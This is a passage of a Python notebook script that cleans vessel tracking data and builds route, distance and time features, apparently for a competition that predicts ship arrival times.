RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nimport pickle\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport time\nimport datetime\nimport gc\nimport warnings\n\nwarnings.filterwarnings('ignore')\npd.set_option('display.max_columns', None)\n\n\n# In[2]:\n\n\ndef reduce_mem(df):\n    \"\"\"Downcast numeric columns to the smallest dtype that can hold their values.\"\"\"\n    start_mem = df.memory_usage().sum() / 1024 ** 2\n    for col in df.columns:\n        col_type = df[col].dtypes\n        if col_type != object:\n            c_min = df[col].min()\n            c_max = df[col].max()\n            if str(col_type)[:3] == 'int':\n                if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:\n                    df[col] = df[col].astype(np.int8)\n                elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:\n                    df[col] = df[col].astype(np.int16)\n                elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:\n                    df[col] = df[col].astype(np.int32)\n                elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:\n                    df[col] = df[col].astype(np.int64)\n            else:\n                if c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max:\n                    df[col] = 
df[col].astype(np.float16)\n                elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:\n                    df[col] = df[col].astype(np.float32)\n                else:\n                    df[col] = df[col].astype(np.float64)\n    end_mem = df.memory_usage().sum() / 1024 ** 2\n    print('Mem. usage: {:.2f} Mb -> {:.2f} Mb ({:.2f} % reduction)'.format(start_mem, end_mem, 100 * (start_mem - end_mem) / start_mem))\n    gc.collect()\n    return df\n\n\n# In[3]:\n\n\ndata = pd.read_pickle('./data/sample_180.pkl')\ndata['timestamp'] = data['timestamp'].astype('str')\ndata = reduce_mem(data)\ngc.collect()\n\n\n# In[4]:\n\n\ntest = pd.read_csv('./data/Btest0711_ALL.csv')\ntrain1 = pd.read_csv('./data/R2 ATest 0711.csv')\ntrain1_label = base = pd.read_csv('./data/Abase.csv')\nport = pd.read_csv('./data/port_2.csv')\n\n\n# In[5]:\n\n\n# Drop the scored orders that were removed from the round-A test data, so the rest can be added to the training data later\nl1 = ['AC860038925693',\n'CS952075060675',\n'DM428031991357',\n'DS626552529494',\n'EI581767201011',\n'GA472803281061',\n'HL358914564422',\n'JE845105704656',\n'LK919030439899',\n'LR291426429726',\n'LY233998601535',\n'NJ417242079579',\n'PP710466021916',\n'PQ602767500334',\n'QF723400588858',\n'UK663883669352',\n'VJ323567531982',\n'ZQ798500357614',\n'ZS950908209190']\ntrain1 = train1[~train1['loadingOrder'].isin(l1)].reset_index(drop=True)\ntrain1_label = train1_label[~train1_label['loadingOrder'].isin(l1)].reset_index(drop=True)\n\n\n# In[6]:\n\n\n# Deduplicate the records\ndata1 = data.drop_duplicates(['loadingOrder','timestamp','vesselMMSI'])\ndel data\n\n\n# ### Sort every file in chronological order\n\n# In[7]:\n\n\ndata1['timestamp'] = pd.to_datetime(data1['timestamp'], infer_datetime_format=True)\ndata1 = data1.groupby(['loadingOrder','vesselMMSI']).apply(lambda x: x.sort_values('timestamp')).reset_index(drop=True)\n\n\n# In[8]:\n\n\ntrain1['timestamp'] = pd.to_datetime(train1['timestamp'], infer_datetime_format=True)\ntrain1 = train1.groupby(['loadingOrder','vesselMMSI']).apply(lambda x: x.sort_values('timestamp')).reset_index(drop=True)\n\n\n# In[9]:\n\n\ntest['timestamp'] = pd.to_datetime(test['timestamp'], infer_datetime_format=True)\ntest = test.groupby(['loadingOrder','vesselMMSI']).apply(lambda x: x.sort_values('timestamp')).reset_index(drop=True)\n\n\n# In[10]:\n\n\n# Deduplicate by position as well\ndata1 = data1.drop_duplicates(['longitude','vesselMMSI','latitude','loadingOrder'])\ntest = test.drop_duplicates(['longitude','vesselMMSI','latitude','loadingOrder'])\ntrain1 = train1.drop_duplicates(['longitude','vesselMMSI','latitude','loadingOrder'])\n\n\n# ### Data cleaning\n\n# In[11]:\n\n\ndef get_sample_anchor(df):\n    # Per-record deltas of position and time within each (order, vessel) group\n    df['timestamp'] = pd.to_datetime(df['timestamp'], infer_datetime_format=True)\n    tmp=df.groupby(['loadingOrder','vesselMMSI'])\n    df['lat_diff'] = tmp['latitude'].diff(1)\n    df['lon_diff'] = tmp['longitude'].diff(1)\n    df['diff_seconds'] = tmp['timestamp'].diff(1).dt.total_seconds()\n    #df['change_ratio'] = (abs(df['lat_diff'])+abs(df['lon_diff']))/((df['diff_seconds'])/60)\n    return df\ndata1 = get_sample_anchor(data1)\ntest = get_sample_anchor(test)\ntrain1 = get_sample_anchor(train1)\ngc.collect()\n\n\n# In[12]:\n\n\n#test = test[test['diff_seconds']>=30]\n# Drop training orders whose positions jump wildly two or more times\nl1 = []\nfor i,v in data1[((abs(data1['lon_diff'])+abs(data1['lat_diff']))>20)&(abs(data1['diff_seconds'])<86400)].loadingOrder.value_counts().items():\n    if v>1:\n        l1.append(i)\ndata1 = data1[~(data1['loadingOrder'].isin(l1))]\ndel l1\n'''# Likewise, remove orders that stay in port for a very long time\nl1 = list(data1[(data1['diff_seconds']>864000)&((abs(data1['lon_diff'])+abs(data1['lat_diff']))<1)].loadingOrder.value_counts().index)\ndata1 = data1[~(data1['loadingOrder'].isin(l1))]\ndel l1'''\ngc.collect()\n\n\n# 
In[13]:\n\n\n# Drop rows where direction is -1 or the time delta is 0; speeds below 0 or at/above 40 were also meant to be removed\ndef get_train_sample(df):\n    #df = df.loc[df['direction'] != -1]\n    df = df.loc[df['diff_seconds'] != 0]\n    df = df.loc[(df['speed']>=0)]\n    #df = df.loc[(df['speed']>=0)&(df['speed']<=50)]\n    del df['lat_diff'],df['lon_diff'],df['diff_seconds']\n    return df\ndef get_test_sample(df):\n    #df = df.loc[df['direction'] != -1]\n    df = df.loc[df['diff_seconds'] != 0]\n    df = df.loc[(df['speed']>=0)]\n    #df = df.loc[(df['speed']>=0)&(df['speed']<=50)]\n    del df['lat_diff'],df['lon_diff'],df['diff_seconds']\n    return df\ndata1 = get_train_sample(data1)\ntest = get_test_sample(test)\ntrain1 = get_test_sample(train1)\ngc.collect()\n\n\n# In[14]:\n\n\ntrain1['timestamp'] = train1['timestamp'].apply(lambda x:x.strftime('%Y/%m/%d %H:%M:%S'))\ntrain1['timestamp'] = pd.to_datetime(train1['timestamp'], infer_datetime_format=True)\n\n\n# ### Longitude/latitude feature extraction and cleaning\n\n# In[15]:\n\n\ndata1 = data1.loc[data1['TRANSPORT_TRACE'].notnull()]\ndata1['len'] = data1['TRANSPORT_TRACE'].str.split('-')\ndata1['len'] = data1['len'].str.len()\ndata1 = data1.loc[(data1['len']>=2)]\ngc.collect()\n\n\n# In[16]:\n\n\ntest['len'] = test['TRANSPORT_TRACE'].str.split('-')\ntest['len'] = test['len'].str.len()\ngc.collect()\n\n\n# In[17]:\n\n\ntrain1['len'] = train1['TRANSPORT_TRACE'].str.split('-')\ntrain1['len'] = train1['len'].str.len()\ngc.collect()\n\n\n# In[18]:\n\n\n# Get the start and end ports from the transport trace\ndef get_pot(df):\n    df['start_pot'] = df['TRANSPORT_TRACE'].str.split('-').apply(lambda x:x[0])\n    df['end_pot'] = df['TRANSPORT_TRACE'].str.split('-').apply(lambda x:x[-1])\n    return df\ntrain = get_pot(data1)\ntrain['timestamp'] = train['timestamp'].astype('str')\ntrain = reduce_mem(train)\ntest = get_pot(test)\ntrain1 = get_pot(train1)\ndel data1\ngc.collect()\n\n\n# ### Unify ports that go by several names, and keep only data whose start/end ports also occur in test\n\n# In[19]:\n\n\nhk=['HONGKONG','CNHKG','HKHKG','HKG','HONG KONG_HONG KONG','CNSHK']\nsz=['CNDCB','CNNSA','YANTIAN','SZX','SHEKOU','CNYTN','YTN','CNCWN','CNSHK','DEHAM','HON']\nfos=['FRFOS','FOS']\nbey=['LBBEY','BEY']\ntnc=['ESALG','TNTUN','MAPTM']\n\n\n# In[20]:\n\n\ntrain.loc[train.end_pot.isin(hk),'end_pot']='CNHKG'\ntrain.loc[train.end_pot.isin(sz),'end_pot']='CNYTN'\ntrain.loc[train.end_pot.isin(fos),'end_pot']='FOS'\ntrain.loc[train.end_pot.isin(tnc),'end_pot']=tnc[0]\ngc.collect()\n\n\n# In[21]:\n\n\ntest.loc[test.end_pot.isin(hk),'end_pot']='CNHKG'\ntest.loc[test.end_pot.isin(sz),'end_pot']='CNYTN'\ntest.loc[test.end_pot.isin(fos),'end_pot']='FOS'\ntest.loc[test.end_pot.isin(tnc),'end_pot']=tnc[0]\ngc.collect()\n\n\n# In[22]:\n\n\ntrain1.loc[train1.end_pot.isin(hk),'end_pot']='CNHKG'\ntrain1.loc[train1.end_pot.isin(sz),'end_pot']='CNYTN'\ntrain1.loc[train1.end_pot.isin(fos),'end_pot']='FOS'\ntrain1.loc[train1.end_pot.isin(tnc),'end_pot']=tnc[0]\ngc.collect()\n\n\n# In[23]:\n\n\ntrain['tra'] = train['start_pot'] + '-' + train['end_pot']\ntest['tra'] = test['start_pot'] + '-' + test['end_pot']\ntrain1['tra'] = train1['start_pot'] + '-' + train1['end_pot']\ngc.collect()\n\n\n# In[24]:\n\n\n# Keep only training data on routes that also appear in test\ntrain = train[train['tra'].isin(list(test['tra'].value_counts().index))]\n\n\n# ### Get port longitude/latitude\n\n# In[25]:\n\n\n# Add the start-port and end-port coordinates to test\nport1 = port[['TRANS_NODE_NAME','LONGITUDE','LATITUDE']].rename(columns={'TRANS_NODE_NAME':'start_pot','LONGITUDE':'start_long','LATITUDE':'start_lat'})\nport2 = port[['TRANS_NODE_NAME','LONGITUDE','LATITUDE']].rename(columns={'TRANS_NODE_NAME':'end_pot','LONGITUDE':'end_long','LATITUDE':'end_lat'})\ntest = test.merge(port1,on='start_pot',how='left')\ntest = 
test.merge(port2,on='end_pot',how='left')\ndel port1,port2\ngc.collect()\n\n\n# In[26]:\n\n\n# Add the start-port and end-port coordinates to train1\nport1 = port[['TRANS_NODE_NAME','LONGITUDE','LATITUDE']].rename(columns={'TRANS_NODE_NAME':'start_pot','LONGITUDE':'start_long','LATITUDE':'start_lat'})\nport2 = port[['TRANS_NODE_NAME','LONGITUDE','LATITUDE']].rename(columns={'TRANS_NODE_NAME':'end_pot','LONGITUDE':'end_long','LATITUDE':'end_lat'})\ntrain1 = train1.merge(port1,on='start_pot',how='left')\ntrain1 = train1.merge(port2,on='end_pot',how='left')\ndel port1,port2\ngc.collect()\n\n\n# In[27]:\n\n\nport1 = port[['TRANS_NODE_NAME','LONGITUDE','LATITUDE']].rename(columns={'TRANS_NODE_NAME':'start_pot','LONGITUDE':'start_long_1','LATITUDE':'start_lat_1'})\nport2 = port[['TRANS_NODE_NAME','LONGITUDE','LATITUDE']].rename(columns={'TRANS_NODE_NAME':'end_pot','LONGITUDE':'end_long_1','LATITUDE':'end_lat_1'})\ntrain = train.merge(port1,on='start_pot',how='left')\ntrain = train.merge(port2,on='end_pot',how='left')\ndel port1,port2\ngc.collect()\n\n\n# In[28]:\n\n\n# Add start and end coordinates to train, taken from each order's first and last record\ntmp=train.drop_duplicates('loadingOrder',keep='last')\ntmp = tmp[['loadingOrder','longitude','latitude']].rename(columns={'longitude':'end_long','latitude':'end_lat'})\ntmp1=train.drop_duplicates('loadingOrder',keep='first')\ntmp1 = tmp1[['loadingOrder','longitude','latitude']].rename(columns={'longitude':'start_long','latitude':'start_lat'})\ntrain = train.merge(tmp,on='loadingOrder',how='left')\ntrain = train.merge(tmp1,on='loadingOrder',how='left')\ntrain = reduce_mem(train)\ngc.collect()\n\n\n# In[29]:\n\n\ntrain = train.loc[train['start_long'].notnull()]\ntrain = train.loc[train['start_lat'].notnull()]\ntrain = train.loc[train['end_long'].notnull()]\ntrain = train.loc[train['end_lat'].notnull()]\ngc.collect()\n\n\n# In[30]:\n\n\ntrain = train.loc[(abs(train['start_long'] - train['start_long_1'])+abs(train['start_lat'] - train['start_lat_1']))<5]\ntrain = train.loc[(abs(train['end_long'] - train['end_long_1'])+abs(train['end_lat'] - train['end_lat_1']))<5]\ndel train['start_long_1'],train['start_lat_1'],train['end_long_1'],train['end_lat_1']\ntrain = reduce_mem(train)\ngc.collect()\n\n\n# In[31]:\n\n\n# Append the round-A test data to the training data so features are built for both together\ndel train1['onboardDate']\ntrain = pd.concat([train,train1],axis=0).reset_index(drop=True)\n\n\n# ### Approximate each vessel's sailing distance from the route field, via the intermediate ports\n\n# In[32]:\n\n\nport3 = pd.read_csv('./data/port_3.csv')\n\n\n# In[33]:\n\n\n# Split the data by route length\ndef get_int(df):\n    df['longitude1'] = df['longitude'].astype(int) // 3 * 3\n    df['latitude1'] = df['latitude'].astype(int) // 3 * 3\n    return df\n# For two-port routes, each point's previous/next port is simply the start/end port\ndef get_2_trace(df):\n    df['pre_pot'] = df['start_pot']\n    df['next_pot'] = df['end_pot']\n    df['pre_gap'] = 0\n    df['next_gap'] = 0\n    df['pre_long_gap'] = 0\n    df['pre_lat_gap'] = 0\n    df['next_long_gap'] = 0\n    df['next_lat_gap'] = 0\n    return df\ntrain = get_int(train)\ntest = get_int(test)\ntrain_1 = train[train['len']==2].reset_index(drop=True)\ntrain_2 = train[train['len']>2].reset_index(drop=True)\ntest_1 = test[test['len']==2].reset_index(drop=True)\ntest_2 = test[test['len']>2].reset_index(drop=True)\ntrain_1 = get_2_trace(train_1)\ntest_1 = get_2_trace(test_1)\ngc.collect()\n\n\n# In[34]:\n\n\nimport operator\n# Find the ports immediately before and after the current point\ndef get_cur_port(df):\n    data1 = pd.DataFrame()\n    df1 = df.drop_duplicates(['TRANSPORT_TRACE','longitude1','latitude1']).reset_index(drop=True)\n    for i in df1.index:\n        tmp = df1.iloc[i:i+1]\n        l1 = list(list(tmp.TRANSPORT_TRACE.value_counts().index).pop().split('-'))\n        c = dict()\n        d = []\n        for j in 
l1:\n            if j not in list(port3['TRANS_NODE_NAME'].value_counts().index):\n                l1.remove(j)\n        l2 = l1\n        if len(l2)<2:\n            continue\n        for k in range(len(l2)):\n            c[k] = (abs(port3[port3['TRANS_NODE_NAME']==l2[k]].LONGITUDE.values-tmp.longitude.values)+abs(port3[port3['TRANS_NODE_NAME']==l2[k]].LATITUDE.values - tmp.latitude.values))\n        C = sorted(c.items(),key=operator.itemgetter(1))\n        a = C[0][0]\n        b = C[1][0]\n        if a > b:\n            a,b = b,a\n        tmp['pre_pot'] = l2[a]\n        tmp['next_pot'] = l2[b]\n        s1 = ''\n        s2 = ''\n        for i in l2[:a+1]:\n            s1 += '-'+i\n        for i in l2[b:]:\n            s2 += '-'+i\n        tmp['pre_trace'] = s1[1:]\n        tmp['next_trace'] = s2[1:]\n        data1 = pd.concat([data1,tmp],axis=0)\n        del tmp\n    return data1\ntest2 = get_cur_port(test_2)\ntest2 = test2[['TRANSPORT_TRACE','longitude1','latitude1','pre_pot','next_pot','pre_trace','next_trace']]\ntest_2 = test_2.merge(test2,on=['TRANSPORT_TRACE','longitude1','latitude1'],how='left')\ntrain2 = get_cur_port(train_2)\ntrain2 = train2[['TRANSPORT_TRACE','longitude1','latitude1','pre_pot','next_pot','pre_trace','next_trace']]\ntrain_2 = train_2.merge(train2,on=['TRANSPORT_TRACE','longitude1','latitude1'],how='left')\ngc.collect()\n\n\n# In[35]:\n\n\n# Accumulate the coordinate gaps to the previous and next ports along the route\ndef get_pre_next_gap(df):\n    df1 = df.drop_duplicates(['TRANSPORT_TRACE','pre_pot','next_pot']).reset_index(drop=True)\n    merge_gap = pd.DataFrame()\n    for i in df1.index:\n        tmp = df1.iloc[i:i+1]\n        c = d = 0\n        d_long = d_lat = 0\n        d_dis = 0\n        c_long = c_lat = 0\n        l1 = list(list(tmp.pre_trace.value_counts().index).pop().split('-'))\n        l2 = list(list(tmp.next_trace.value_counts().index).pop().split('-'))\n        if len(l1)>1:\n            for k in range(len(l1)-1):\n                if k+1 <= len(l1)-1:\n                    d += (abs(port3[port3['TRANS_NODE_NAME']==l1[k+1]].LONGITUDE.values - port3[port3['TRANS_NODE_NAME']==l1[k]].LONGITUDE.values)+abs(port3[port3['TRANS_NODE_NAME']==l1[k+1]].LATITUDE.values - port3[port3['TRANS_NODE_NAME']==l1[k]].LATITUDE.values))\n                    d_long += abs(port3[port3['TRANS_NODE_NAME']==l1[k+1]].LONGITUDE.values - port3[port3['TRANS_NODE_NAME']==l1[k]].LONGITUDE.values)\n                    d_lat += abs(port3[port3['TRANS_NODE_NAME']==l1[k+1]].LATITUDE.values - port3[port3['TRANS_NODE_NAME']==l1[k]].LATITUDE.values)\n                    #d_dis += distance(port3[port3['TRANS_NODE_NAME']==l1[k]].LATITUDE.values,port3[port3['TRANS_NODE_NAME']==l1[k+1]].LATITUDE.values,port3[port3['TRANS_NODE_NAME']==l1[k]].LONGITUDE.values,port3[port3['TRANS_NODE_NAME']==l1[k+1]].LONGITUDE.values)\n        else:\n            d = 0\n            d_long = 0\n            d_lat = 0\n            #d_dis = 0\n        tmp['pre_gap'] = d\n        tmp['pre_long_gap'] = d_long\n        tmp['pre_lat_gap'] = d_lat\n        #tmp['pre_distance'] = d_dis\n        if len(l2)>1:\n            for k in range(len(l2)-1):\n                if k+1 <= len(l2)-1:\n                    c += (abs(port3[port3['TRANS_NODE_NAME']==l2[k+1]].LONGITUDE.values - port3[port3['TRANS_NODE_NAME']==l2[k]].LONGITUDE.values)+abs(port3[port3['TRANS_NODE_NAME']==l2[k+1]].LATITUDE.values - port3[port3['TRANS_NODE_NAME']==l2[k]].LATITUDE.values))\n                    c_long += abs(port3[port3['TRANS_NODE_NAME']==l2[k+1]].LONGITUDE.values - port3[port3['TRANS_NODE_NAME']==l2[k]].LONGITUDE.values)\n                    c_lat += abs(port3[port3['TRANS_NODE_NAME']==l2[k+1]].LATITUDE.values - port3[port3['TRANS_NODE_NAME']==l2[k]].LATITUDE.values)\n        else:\n            c = 0\n            c_long = 0\n            c_lat = 0\n        tmp['next_gap'] = c\n        tmp['next_long_gap'] = c_long\n        tmp['next_lat_gap'] = c_lat\n        merge_gap = pd.concat([merge_gap,tmp],axis=0)\n    return merge_gap\ntest_merge_gap = get_pre_next_gap(test_2)\ntest_merge_gap = 
test_merge_gap[['TRANSPORT_TRACE','pre_pot','next_pot','pre_gap','next_gap','pre_long_gap','pre_lat_gap','next_long_gap','next_lat_gap']]\ntest_2 = test_2.merge(test_merge_gap,on=['TRANSPORT_TRACE','pre_pot','next_pot'],how='left')\ndel test_merge_gap\ndel test_2['pre_trace'],test_2['next_trace']\ntrain_merge_gap = get_pre_next_gap(train_2)\ntrain_merge_gap = train_merge_gap[['TRANSPORT_TRACE','pre_pot','next_pot','pre_gap','next_gap','pre_long_gap','pre_lat_gap','next_long_gap','next_lat_gap']]\ntrain_2 = train_2.merge(train_merge_gap,on=['TRANSPORT_TRACE','pre_pot','next_pot'],how='left')\ndel train_merge_gap\ndel train_2['pre_trace'],train_2['next_trace']\n\n\n# In[36]:\n\n\ntrain = pd.concat([train_1,train_2],axis=0).reset_index(drop=True)\ntest = pd.concat([test_1,test_2],axis=0).reset_index(drop=True)\ndef get_gap(df):\n    # Merge in the previous/next port coordinates, then subtract the current position to get the distance to each\n    port1 = port3[['TRANS_NODE_NAME','LONGITUDE','LATITUDE']].rename(columns={'TRANS_NODE_NAME':'pre_pot','LONGITUDE':'pre_long','LATITUDE':'pre_lat'})\n    port2 = port3[['TRANS_NODE_NAME','LONGITUDE','LATITUDE']].rename(columns={'TRANS_NODE_NAME':'next_pot','LONGITUDE':'next_long','LATITUDE':'next_lat'})\n    df = df.merge(port1,on='pre_pot',how='left')\n    df = df.merge(port2,on='next_pot',how='left')\n    del port1,port2\n    df['start_gap'] = (abs(df['longitude']-df['pre_long']) + abs(df['latitude']-df['pre_lat'])) + df['pre_gap']\n    df['end_gap'] = (abs(df['longitude']-df['next_long']) + abs(df['latitude']-df['next_lat'])) + df['next_gap']\n    #--------------------------------------------------------------------------------------------------------------\n    df['start_long_gap'] = abs(df['longitude']-df['pre_long']) + df['pre_long_gap']\n    df['start_lat_gap'] = abs(df['latitude']-df['pre_lat']) + df['pre_lat_gap']\n    df['end_long_gap'] = abs(df['longitude']-df['next_long']) + df['next_long_gap']\n    df['end_lat_gap'] = abs(df['latitude']-df['next_lat']) + df['next_lat_gap']\n    #df['have_run_distance'] = distance(df.latitude.values,df.pre_lat.values,df.longitude.values,df.pre_long.values)\n    #df['cumsum_distance'] = df['have_run_distance'] + df['pre_distance']\n    del df['pre_long'],df['pre_gap'],df['next_long'],df['next_gap'],df['longitude1'],df['latitude1'],df['pre_lat'],df['next_lat']\n    del df['pre_long_gap'],df['pre_lat_gap'],df['next_long_gap'],df['next_lat_gap']#,df['have_run_distance'],df['pre_distance']\n    return df\ntrain = get_gap(train)\ntest = get_gap(test)\ngc.collect()\n\n\n# In[37]:\n\n\ndef get_all_trace(df):\n    # Build the total longitude/latitude change along each full route\n    dic1 = dict()\n    for i in list(df['TRANSPORT_TRACE'].value_counts().index):\n        l1 = list(i.split('-'))\n        c = 0\n        for j in l1:\n            if j not in list(port3['TRANS_NODE_NAME'].value_counts().index):\n                l1.remove(j)\n        l2 = l1\n        for k in range(len(l2)-1):\n            if k+1 <= len(l2):\n                c += (abs(port3[port3['TRANS_NODE_NAME']==l2[k+1]].LONGITUDE.values - port3[port3['TRANS_NODE_NAME']==l2[k]].LONGITUDE.values)+abs(port3[port3['TRANS_NODE_NAME']==l2[k+1]].LATITUDE.values - port3[port3['TRANS_NODE_NAME']==l2[k]].LATITUDE.values))\n        dic1[i] = c\n        del l1,l2\n    for i,v in dic1.items():\n        if v > 0:\n            dic1[i] = float('%.6f'%v)\n        else:\n            dic1[i] = 0\n    return dic1\nmap_dic_train = get_all_trace(train)\nmap_dic_test = get_all_trace(test)\ntrain['all_gap']=train['TRANSPORT_TRACE'].map(map_dic_train)\ntest['all_gap']=test['TRANSPORT_TRACE'].map(map_dic_test)\n\n\n# ### Feature construction\n\n# In[38]:\n\n\ndef get_data(data, model='train'):\n    # Convert to timestamps and sort each loading order chronologically\n    assert model=='train' or model=='test'\n    
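# The sort is done in place; the later diff()/shift() features rely on this per-(order, vessel) time ordering\n    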
data.sort_values(['loadingOrder','vesselMMSI','timestamp'],inplace=True)\n    if model=='train':\n        pass\n#         data['vesselNextportETA'] = pd.to_datetime(data['vesselNextportETA'], infer_datetime_format=True)\n    else:\n        data['onboardDate'] = pd.to_datetime(data['onboardDate'], infer_datetime_format=True)\n    data['timestamp'] = pd.to_datetime(data['timestamp'], infer_datetime_format=True)\n    return data\ndef get_anchor(df):\n    # Convert direction to 360-degree headings\n    df['direction']=df['direction'].values/10\n    tmp=df.groupby(['loadingOrder','vesselMMSI'])\n    df['lat_diff'] = abs(tmp['latitude'].diff(1))\n    df['lon_diff'] = abs(tmp['longitude'].diff(1))\n    df['speed_diff'] = abs(tmp['speed'].diff(1))\n    df['direction_diff']= abs(tmp['direction'].diff(1))\n    df['diff_seconds'] = tmp['timestamp'].diff(1).dt.total_seconds()\n    ### This effectively performs a sampling!! # duplicate records can be removed\n    df['anchor'] =((abs(df['lat_diff'])<= 0.03)&(abs(df['lon_diff']) <= 0.03)&(abs(df['speed_diff']) <= 0.3)).astype('int')\n    ### Mark the places where the vessel is almost stopped\n    df['stop']=((abs(df['lat_diff']) <= 0.03)&(abs(df['lon_diff']) <= 0.03)&(abs(df['speed']) <= 1)).astype('int')\n    df['delay']=(abs(df['diff_seconds'])>3000).astype('int')\n    # The diff features need to be divided by the time delta\n    df['lat_diff'] = df['lat_diff'] / (df['diff_seconds'] / 3600)\n    df['lon_diff'] = df['lon_diff'] / (df['diff_seconds'] / 3600)\n    df['speed_diff'] = df['speed_diff'] / (df['diff_seconds'] / 3600)\n    df['direction_diff'] = df['direction_diff'] / (df['diff_seconds'] / 3600)\n    # Record whether the vessel is stopped in port\n    #df['stop']=((abs(df['lat_diff'])<0.02)&(abs(df['lon_diff'])<0.02)&(abs(df['speed'])<10)).astype('int')\n    #df['stop_times']=(df['stop']*df['diff_seconds']).cumsum()//3600\n    return df\ndef distance(LatA,LatB,LonA,LonB):\n    EARTH_RADIUS = 6378.137  # kilometres\n    def rad(d):\n        return d * np.pi/ 180.0\n    s=0\n    radLatA = rad(LatA)\n    radLatB = rad(LatB)\n    a = radLatA-radLatB\n    b = rad(LonA)-rad(LonB)\n    s= 2 * np.arcsin(np.sqrt(np.power(np.sin(a / 2),2)+ np.cos(radLatA) * np.cos(radLatB)*np.power(np.sin(b / 2),2)))\n    s=s* EARTH_RADIUS\n    # Keep two decimal places\n    s = np.round(s * 100)/100\n    s = s * 1000  # convert to metres\n    return s\ndef get_feature(df,model='train'):\n    # Per-step movement (m), used later to compute the track length\n    df['move_leng']=distance(df.latitude.values,df.groupby(['loadingOrder','vesselMMSI'])['latitude'].shift(1).values,df.longitude.values,df.groupby(['loadingOrder','vesselMMSI'])['longitude'].shift(1).values)\n    # Cumulative distance travelled so far\n    df['cumsum_distance'] = df.groupby(['loadingOrder','vesselMMSI'])['move_leng'].expanding().sum().values\n    #-----------------------------------------------------------------------------------------------------------------------\n    # Cumulative distance the vessel has already sailed\n    #df['cusum_distance'] = distance(df.start_long_gap.values,df.start_lat_gap.values,df.start_lat.values,df.start_lat.values+df.start_long_gap.values)\n    \n    #-----------\n    df['cusum_direction'] = df.groupby(['loadingOrder','vesselMMSI'])['direction'].expanding().mean().values\n    #df['cusum_mean_speed'] = df.groupby('loadingOrder')['speed'].expanding().mean().reset_index(drop=True)\n    df['cusum_stop'] = df.groupby('loadingOrder')['stop'].cumsum()\n    df['cusum_speed']=df.groupby(['loadingOrder','vesselMMSI'])['speed'].rolling(window=5).mean().values\n    #------------------------------------------------------\n    df['direction_valc']=df['direction_diff']/df['diff_seconds']\n    df['mean_speed'] = df['move_leng']/(df['diff_seconds']+0.01)\n    # Instantaneous acceleration, m/s^2\n    df['instant_acc']=df['mean_speed']/(df['diff_seconds']+0.01)\n    \n    # Travelled fraction of longitude/latitude and of the whole voyage\n    df['end_long_gap_1'] = abs(df['end_long']-df['longitude'])\n    df['end_lat_gap_1'] = abs(df['end_lat']-df['latitude'])\n    df['start_long_gap_1'] = 
abs(df['start_long']-df['longitude'])\n    df['start_lat_gap_1'] = abs(df['start_lat']-df['latitude'])\n    #df['start_long_ratio'] = abs(df['longitude']-df['start_long']) / abs(df['end_long']-df['start_long'])\n    #df['start_lat_ratio'] = abs(df['latitude']-df['start_lat']) / abs(df['end_lat']-df['start_lat'])\n    #df['end_long_ratio'] = abs(df['longitude']-df['end_long']) / abs(df['end_long']-df['start_long'])\n    #df['end_lat_ratio'] = abs(df['latitude']-df['end_lat']) / abs(df['end_lat']-df['start_lat'])\n    # Overall gap features\n    #df['all_start_gap'] = abs(df['start_long_gap']) + abs(df['start_lat_gap'])\n    df['all_start_ratio'] = df['start_gap'] / df['all_gap']\n    #df['all_end_gap'] = abs(df['long_gap']) + abs(df['lat_gap'])\n    df['all_end_ratio'] = 1 - df['all_start_ratio']\n    \n    # Year/month/day time features\n    df['year'] = df['timestamp'].dt.year\n    df['month'] = df['timestamp'].dt.month\n    df['day'] = df['timestamp'].dt.day\n    df['hour'] = df['timestamp'].dt.hour\n    df['time'] = df['year'].astype(str)+'-'+df['month'].astype(str)+'-'+df['day'].astype(str)\n    \n    ## Get the earliest record per (order, vessel)\n    tmp=df.drop_duplicates(['loadingOrder','vesselMMSI'],keep='first').reset_index(drop=True)\n    tmp=tmp[['loadingOrder','vesselMMSI','timestamp','direction']]\n    tmp.columns=['loadingOrder','vesselMMSI','start_time','start_direction']\n    df=df.merge(tmp,on=['loadingOrder','vesselMMSI'],how='left')\n    if model == 'train':\n        df['have_run_time']=(df['timestamp']-df['start_time']).dt.total_seconds()\n    if model == 'test':\n        df['timestamp'] = df['timestamp'].apply(lambda x:x.strftime('%Y/%m/%d %H:%M:%S'))\n        df['timestamp'] = pd.to_datetime(df['timestamp'], infer_datetime_format=True)\n        df['onboardDate'] = pd.to_datetime(df['onboardDate'], infer_datetime_format=True)\n        df['have_run_time'] = (df['timestamp'] - df['onboardDate']).dt.total_seconds()\n        df['distanc2taget']=distance(df.latitude.values,df.end_lat.values,df.longitude.values,df.end_long.values)/1000\n    df['start_time'] = df['start_time'].dt.year.astype(str) + '-' + df['start_time'].dt.month.astype(str) + '-' + df['start_time'].dt.day.astype(str)\n    df['cumsum_mean_speed'] = df['cumsum_distance']/(df['have_run_time']+0.01)\n    # Instantaneous acceleration, m/s^2\n    df['cumsum_instant_acc']=df['cumsum_mean_speed']/(df['have_run_time']+0.01)\n    \n    #df['bearing'] = bearing_array(df.latitude.values,df.longitude.values,df.groupby('loadingOrder')['latitude'].shift(1).values,df.groupby('loadingOrder')['longitude'].shift(1).values)\n    #df['start_bearing'] = bearing_array(df['start_lat'],df['start_long'],df['latitude'],df['longitude'])\n    #df['end_bearing'] = bearing_array(df['latitude'],df['longitude'],df['end_lat'],df['end_long'])\n    return df\ndef get_hot(df):\n    df['day_tag']=(df.timestamp.dt.year%100)*10000+df.timestamp.dt.month*100+df.timestamp.dt.day\n    df = df.merge(hot,on=['day_tag','end_pot'],how='left')\n    return df\ndef type_encoding(train_data,test_data):\n    ### ---- Encode the categorical columns\n    for f in ['TRANSPORT_TRACE','carrierName','vesselMMSI','time','start_time']:\n        unique_set=set(train_data[f].unique().tolist()+test_data[f].unique().tolist())\n        unique_dict={ f:i for i,f in enumerate(unique_set)}\n        test_data[f]=test_data[f].map(unique_dict)\n        train_data[f]=train_data[f].map(unique_dict)\n    \n    # Encode the port names with one shared dictionary\n    unique_set=set(train_data['start_pot'].unique().tolist()+test_data['start_pot'].unique().tolist()+train_data['end_pot'].unique().tolist()+test_data['end_pot'].unique().tolist())\n    unique_dict={ f:i for i,f in 